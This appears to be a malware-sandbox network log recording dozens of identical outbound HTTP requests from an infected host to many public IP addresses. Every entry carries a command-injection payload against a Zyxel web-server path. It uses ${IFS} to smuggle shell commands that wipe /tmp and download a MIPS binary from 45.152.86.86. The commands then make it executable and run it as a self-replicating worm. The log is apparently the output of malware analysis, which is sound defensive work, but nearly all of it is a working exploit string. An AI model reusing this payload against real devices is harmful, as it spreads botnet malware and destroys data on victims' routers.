                                        Mar 31, 2024 09:22:09.503391027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7091192.168.2.2355454172.147.247.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503439903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7092192.168.2.235936014.224.34.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503484964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7093192.168.2.235621636.134.68.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503535986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7094192.168.2.235698041.126.225.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503555059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7095192.168.2.2351984139.65.80.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503601074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7096192.168.2.235787672.98.10.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503659010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7097192.168.2.235536042.160.134.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503710985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7098192.168.2.2336016150.45.237.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503758907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7099192.168.2.2351478109.39.255.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503806114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7100192.168.2.235911246.9.180.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503878117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7101192.168.2.2337630199.60.67.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503909111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7102192.168.2.2338778108.221.10.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503946066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7103192.168.2.233376625.215.28.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504019976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7104192.168.2.2351660161.151.51.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504065037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7105192.168.2.2348490156.248.247.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504110098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7106192.168.2.235542273.44.173.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504153967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7107192.168.2.2337486217.144.164.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504194975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7108192.168.2.23492228.188.51.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504234076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7109192.168.2.234103813.183.14.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504292011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7110192.168.2.233399635.206.56.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504343033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7111192.168.2.233455844.223.190.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504390955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7112192.168.2.2349042139.87.122.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504462957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7113192.168.2.2357852169.48.205.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504493952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7114192.168.2.2345450142.20.233.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504551888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7115192.168.2.235268265.2.205.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504602909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7116192.168.2.2335626109.72.205.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504637003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7117192.168.2.2347970203.232.41.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504705906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7118192.168.2.2353990221.200.130.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504741907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7119192.168.2.2341322175.213.68.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504777908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7120192.168.2.23529348.207.247.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504836082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7121192.168.2.233807251.88.114.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504875898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7122192.168.2.2333012199.99.70.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504929066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7123192.168.2.2341540183.141.238.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.504993916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7124192.168.2.2339014128.91.44.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505048990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7125192.168.2.2350300176.110.88.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505086899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7126192.168.2.2347106153.240.41.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505139112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7127192.168.2.2360822189.143.198.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505177975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7128192.168.2.2341066129.47.133.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505207062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7129192.168.2.2354192182.226.55.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505251884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7130192.168.2.2340486148.249.143.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505290031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7131192.168.2.2336420152.197.240.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505337954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7132192.168.2.233648235.75.143.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505389929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7133192.168.2.2335134219.129.144.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505420923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7134192.168.2.2333886211.26.161.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505465984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7135192.168.2.2348068197.111.88.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505511045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7136192.168.2.235151273.18.240.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505559921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7137192.168.2.23406181.165.75.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505608082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7138192.168.2.234081280.9.99.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505657911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7139192.168.2.236095669.241.169.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505697012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7140192.168.2.233580254.106.120.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505731106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7141192.168.2.234979640.0.109.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505769014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7142192.168.2.233451096.197.39.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505801916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7143192.168.2.2338972222.144.91.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505883932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7144192.168.2.235015874.46.186.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505918026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7145192.168.2.2346298154.212.123.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.505955935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7146192.168.2.23406264.153.151.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506026983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7147192.168.2.2335730166.242.110.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506067038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7148192.168.2.233691618.193.218.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506134033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7149192.168.2.2339940126.171.22.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506177902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7150192.168.2.2355298181.99.61.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506226063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7151192.168.2.2350870217.124.53.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506259918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7152192.168.2.233543417.56.62.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506304979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7153192.168.2.2359256153.98.130.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506345034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7154192.168.2.233447870.203.44.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506397963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7155192.168.2.2360486148.238.252.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506433010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7156192.168.2.2356194194.120.116.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506496906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7157192.168.2.2352728139.143.68.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506534100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7158192.168.2.233327652.60.88.229443
                                        TimestampBytes transferredDirectionData
